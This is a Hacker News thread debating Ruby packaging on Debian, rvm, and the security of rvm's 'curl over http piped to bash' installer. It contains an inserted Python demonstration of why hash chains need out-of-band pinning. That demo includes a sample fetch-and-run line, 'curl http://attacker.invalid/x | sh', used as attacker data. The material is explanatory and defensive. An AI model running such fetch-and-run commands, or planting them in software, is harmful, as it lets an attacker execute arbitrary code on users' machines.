
Matz: I use Debian, I have no Ruby problems. - steveklabnik
http://www.ruby-forum.com/topic/785744#971922
======
danieldk
It's great that manual compilation works for Matz. And his great work
notwithstanding, it has little to do with the general user.

As an occasional Ruby programmer, and frequent Ruby-based utility user, I do
not want to compile and install Ruby or Ruby modules myself. If we go down
that road, why don't we compile everything from Python to GStreamer ourselves
(since they all have modules/plugins/...)?

To the general user (as opposed to full-time Ruby programmer), Ruby and Ruby
modules are just dependencies to the application they want to use, and
installation should be automatic. One can only hope that the Ruby community
understands this, and makes it easy for distributors to package their
software.

~~~
kajecounterhack
Have you tried rvm?

    
    
      bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head )
      rvm install 1.9.2
      rvm use 1.9.2 --default
      which ruby
    

EDIT: thanks telemachos. Add this to either .zshrc (if you're using zsh) or
.bash_profile or equivalent:

    
    
      [[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"

~~~
joeyh
Are you seriously suggesting using a package system that is bootstrapped by
downloading and running a shell script with no security protections
whatsoever?

Moreover, it's not just you giving a bad example, as the shell script then
clones a git repository, again with no protections whatsoever (over http by
default to make it really easy to MITM attack), and runs code from _it_. So
this was written by people who just don't care, or don't understand security.
Not people I'd be trusting with package management on my system.

This kind of thing might have been acceptable, barely, before 1995. Since
then, we've developed package systems with gpg signed chains of trust.

~~~
steveklabnik
I think you're being _just a bit_ reactionary.

Besides if you git clone, literally _every commit_ is checksummed. I'm no
security expert, but I don't think MITM-ing a 'git clone' sounds 'really
easy.'

~~~
subway
No, you're clearly not a security expert. If you're doing a git clone over
HTTP, you can't even be certain you're talking to the right git repository.
Sure, each and every commit may be checksummed, but how exactly do you
anticipate knowing what the correct checksums are?

~~~
steveklabnik
Fair enough. Like I said, I don't know enough about this.

> how exactly do you anticipate knowing what the correct checksums are?

Well, because the repo you're cloning knows what they are... I wasn't thinking
about the repo itself being owned, but git's whole job is to make sure that
chunks of text get from one place to the other in an identical state, so...

~~~
vietor
The target repo itself isn't owned, but your connection is. The point is that
you only _think_ that you are talking to the correct repo, when in fact you
are cloning whatever git repository the attacker would like you to.

It's obviously a focused attack as are all MITM attacks, so you can assume the
attacker is familiar with the install script. So when the script then
continues and performs its next action on the contents of the repository, you
will execute an arbitrary payload.

Edit: It wasn't clear to me that the problem had become apparent in the parent
post. Probably just pre-coffee thinking on my part, but hopefully this will
help clarify it for anyone else reading along who also missed it.

~~~
steveklabnik
Yes, when I said 'the remote repo', what I meant was 'the one that I see'.

Thanks for the extra explanation, guys! Makes a lot of sense.
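
An added example (not code from this thread, from rvm or from git) that makes
subway's and vietor's point concrete. It uses a toy content-addressed commit
format (a hex id over the parent id plus the payload), constructed sample data,
and hosts under the reserved `.invalid` domain; it assumes nothing about rvm's
real installer. The point it demonstrates: a hash chain only proves each object
matches its own id, so an attacker who controls the connection can serve a
chain that checks out perfectly. What authenticates the clone, or the bootstrap
script, is comparing what you received against a digest you obtained over a
channel you already trust (a signed tag, a verified release note, a package
from a signed repository).

```python
import hashlib
import hmac

# Toy stand-in for git's content-addressed objects. Not git's real format;
# just enough structure to show what a hash chain does and does not prove.
ROOT = "0" * 40  # "no parent", as an all-zero id


def commit_id(parent: str, payload: bytes) -> str:
    """Id of a toy commit: SHA-1 over the parent id and the payload."""
    h = hashlib.sha1()
    h.update(parent.encode("ascii"))
    h.update(payload)
    return h.hexdigest()


def build_chain(payloads):
    """Linear history as a list of (id, parent_id, payload) tuples."""
    chain, parent = [], ROOT
    for payload in payloads:
        cid = commit_id(parent, payload)
        chain.append((cid, parent, payload))
        parent = cid
    return chain


def chain_is_self_consistent(chain):
    """The only thing 'every commit is checksummed' guarantees: each id is
    really the hash of its own content and parent. Anyone can produce a chain
    that passes this check, including whoever is in the middle of your
    plain-http clone."""
    expected_parent = ROOT
    for cid, parent, payload in chain:
        if parent != expected_parent or commit_id(parent, payload) != cid:
            return False
        expected_parent = cid
    return True


def head_matches_pin(chain, pinned_head: str) -> bool:
    """What actually tells you it is the right repository: the head you
    received equals an id you learned out of band. Without a pin there is
    nothing to compare against, whatever the chain's internal hashes say."""
    return bool(chain) and hmac.compare_digest(chain[-1][0], pinned_head)


def installer_matches_pin(data: bytes, pinned_sha256: str) -> bool:
    """Same idea for the bootstrap script: hash what was fetched and compare
    with a digest obtained out of band before handing the bytes to bash."""
    digest = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(digest, pinned_sha256)


# Constructed sample data (hypothetical; not real rvm content).
GENUINE_INSTALLER = b"#!/bin/sh\ngit clone https://example.invalid/rvm.git\n"
MITM_INSTALLER = b"#!/bin/sh\ncurl http://attacker.invalid/x | sh\n"
GENUINE_SHA256 = hashlib.sha256(GENUINE_INSTALLER).hexdigest()  # the pin

GENUINE_REPO = build_chain([b"rvm 1.0", b"fix typo in README"])
MITM_REPO = build_chain([b"rvm 1.0", b"add post-install hook: curl ... | sh"])
PINNED_HEAD = GENUINE_REPO[-1][0]  # what a signed tag or verified note gives you


if __name__ == "__main__":
    print("genuine repo self-consistent: ", chain_is_self_consistent(GENUINE_REPO))
    print("MITM repo self-consistent:    ", chain_is_self_consistent(MITM_REPO))
    print("genuine head matches pin:     ", head_matches_pin(GENUINE_REPO, PINNED_HEAD))
    print("MITM head matches pin:        ", head_matches_pin(MITM_REPO, PINNED_HEAD))
    print("genuine installer matches pin:", installer_matches_pin(GENUINE_INSTALLER, GENUINE_SHA256))
    print("MITM installer matches pin:   ", installer_matches_pin(MITM_INSTALLER, GENUINE_SHA256))
```

Both repositories pass the self-consistency check, which is all a clone can
verify on its own; only the pinned head separates them. The same applies to
the installer: `bash < <(curl ...)` skips the comparison step entirely, and
fetching over plain http means the attacker chooses both the script and the
repository it goes on to clone.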

------
lylejohnson
Assuming this is a response to yesterday's news about Debian's Ruby
maintainer, I don't see how it's relevant. Matz is almost certainly compiling
his own Ruby (as many Rubyists do) and not using the Debian packages for Ruby.

~~~
steveklabnik
It's true. I mostly just thought it was interesting, after reading all that
hubbub over the last few days, to pop open ruby-talk and see this...

At the same time, there is a certain amount of relevance: while lots of
Rubyists (including myself) talk a lot of shit on Debian, Debian is still the
only Linux that is (technically) supported by Ruby. It's this way because the
Hudson (or whatever, it's still early...) server is running Debian, and they
don't have another box or two... but still, I guess my point is that Debian is
important, no matter how frustrating their policies may seem at times.

------
fingerprinter
I'm seeing a trend in the comments re RVM and other suggestions.

There are essentially two issues at hand here and we would all do well to
remember the difference between the two.

1. Ruby as a good citizen in a distro
2. Ruby as a development tool for programmers

#2 is mainly achieved via RVM for sure. I program both Ruby and Python and as
well as some JS and Erlang. I LOVE RVM for ruby/gem management and actually
prefer it to Python's virtualenv (just a preference! Don't bite my head off ;)
)

#1, however, is what we should really be talking about as it is what the
original debian maintainer was complaining about. Matz is more talking about
#2.

I use Ubuntu as my development and deployment platform. I could never imagine
if Python was not available, stable and usable as a base package on Ubuntu
without me having to do some RVM/Virtualenv incantation each time. Sure, there
could be a chef/puppet/script installation approach, but why? And for those
who think this is trivial, think about all the packages that are in fact
written in Python that are part of the desktop or base system. Python is
literally embedded in everything!

One of the greatest things about Debian/Ubuntu, and why I think it is the
premier development platform, are things like: sudo aptitude install
build-essential

All that being said, this is a very hard problem to generally solve. I would
hope that Ruby would be more Pythonic in the distro, but I don't see it being
a priority for Ruby folks anytime soon....

Side note: go look up the transition from Python2.6 to Python2.7 for upcoming
Ubuntu 11.04 to see what is involved in such a transition. It is non-trivial
to say the least but Debian/Ubuntu maintainers are doing a stellar job with
it...it is a complex issue and much care is needed...

And as another aside...anyone remember the Ubuntu rolling releases issue? At
its core with rolling releases was things like the Python2.6 -> Python2.7
transition...not something you can easily achieve in true distro rolling
releases and again, just an example of why this is a complex problem and
things like RVM are not appropriate for discussion of #2 as it stands.

~~~
telemachos
I agree with much of what you say about the two different threads and
perspectives here (and elsewhere) whenever this argument comes up. However:

> And for those who think this is trivial, think about all the packages that
> are in fact written in Python that are part of the desktop or base system.
> Python is literally embedded in everything! [...then later...] All that
> being said, this is a very hard problem to generally solve. I would hope
> that Ruby would be more Pythonic in the distro, but I don't see it being a
> priority for Ruby folks anytime soon....

You say that Ruby should be more Pythonic and that this is not a priority for
"Ruby folks", but I'm not sure that's a fair way to characterize the distro
problem. In fact, from Ruby's point of view, Debian has a special pride of
place: it's the _only_ officially supported Linux distro (since testing is
done on Debian machines, I believe). For more on that see the discussion and
links in this thread: <http://news.ycombinator.com/item?id=1614618>
(tenderlove is Aaron Patterson, a Ruby core dev).

I would argue, as I say elsewhere in this thread, that the reason Python is so
well handled is precisely what you mention in the first bit I quote. _Because_
so much of the Gnome desktop is written in Python, perhaps Python gets special
treatment by the distro. That suggests that the distro needs to meet the
language devs at least part way, rather than that the language folks are the
only ones who need to change their attitude.

------
shimonamit
Matz compiles. He doesn't use Debian's packaging.

~~~
bad_user
He most certainly uses Debian's packaging for any dependencies he may need.

Or do you think he also compiles stuff like Readline, IConv, Zlib, OpenSSL? Or
stuff related to Ruby gems, like postgresql-server-8.4, in case he needs
ruby-pg?

On other platforms even installing GCC is a painful process, when on
Debian/Ubuntu it is as easy as:

    
    
          sudo aptitude install build-essential
    

And why would he need to compile his own Ruby for stuff unrelated to
developing the Ruby interpreter? Are you telling me that if he needs to do
some quick processing on some machine he absolutely needs HEAD?

~~~
shimonamit
The backdrop on this topic is the recent news of Debian's Ruby package
maintainer quitting, mostly due to issues he has with the Ruby core community
and the maintenance/release process.

This post by Matz was supposedly submitted to debunk the myth that "Ruby's not
for Debian", but it is entirely orthogonal to the issue at hand. Matz
undoubtedly compiles his Ruby, as most maintainers would do with their
projects, rather than install using Debian's package manager.

~~~
steveklabnik
If you look at the topic of the thread, it's to a user. The ruby-talk mailing
list is for general discussion, and the title of the thread is "Best Linux
Distro for Ruby?"

------
poink
I just don't get why this is supposedly a Ruby problem rather than a $LANG
problem, when Lucas Nussbaum's complaints about Ruby's packaging situation
(sans the whining about Japanese) apply equally well to every other language
you might want to install.

It's also pretty hilarious when a guy maintaining one of 50+ different
distributions of the same software cries about division of manpower upstream.

------
risotto
A tautology, no? He wouldn't use Debian if he did have problems.

I get neck deep in large Ruby deployments and the issue is clear to me. Ruby
is evolving at a breakneck speed but as a result has very poor release
management.

My solution:

Use Bash and Python for systems programming. Both are stable and simple well
integrated into Ubuntu and frankly much better for the task anyway. Oh no, now
I can't use Chef! (sarcasm)

Use Ruby for web development, with RVM and bundler. This is a vast universe of
bleeding edge web programming toys.

I struggle to see a real problem here...

~~~
jamesbritt
" Ruby is evolving at a breakneck speed but as a result has very poor release
management."

Just what is changing so fast in Ruby? Is 1.9.2 so much different from 1.9.1?
Has anything changed in 1.8.7?

~~~
steveklabnik
1.9.1 -> 1.9.2 changed the way threads were handled, which was pretty huge.
And good for Ruby.

~~~
jamesbritt
Ah, OK, thanks.

Still, does this count as "breakneck" change?

I'm not seeing it, but maybe I'm too close to the subject matter.

------
buster
Who is matz? Everyone seems to know..

~~~
fingerprinter
The guy who wrote Ruby - <http://en.wikipedia.org/wiki/Yukihiro_Matsumoto>

~~~
buster
Ahhh, ok. Somehow the only Japanese I know is the creator of Mario :p Thanks,
anyway.

I can't imagine I'm the only one who didn't know.

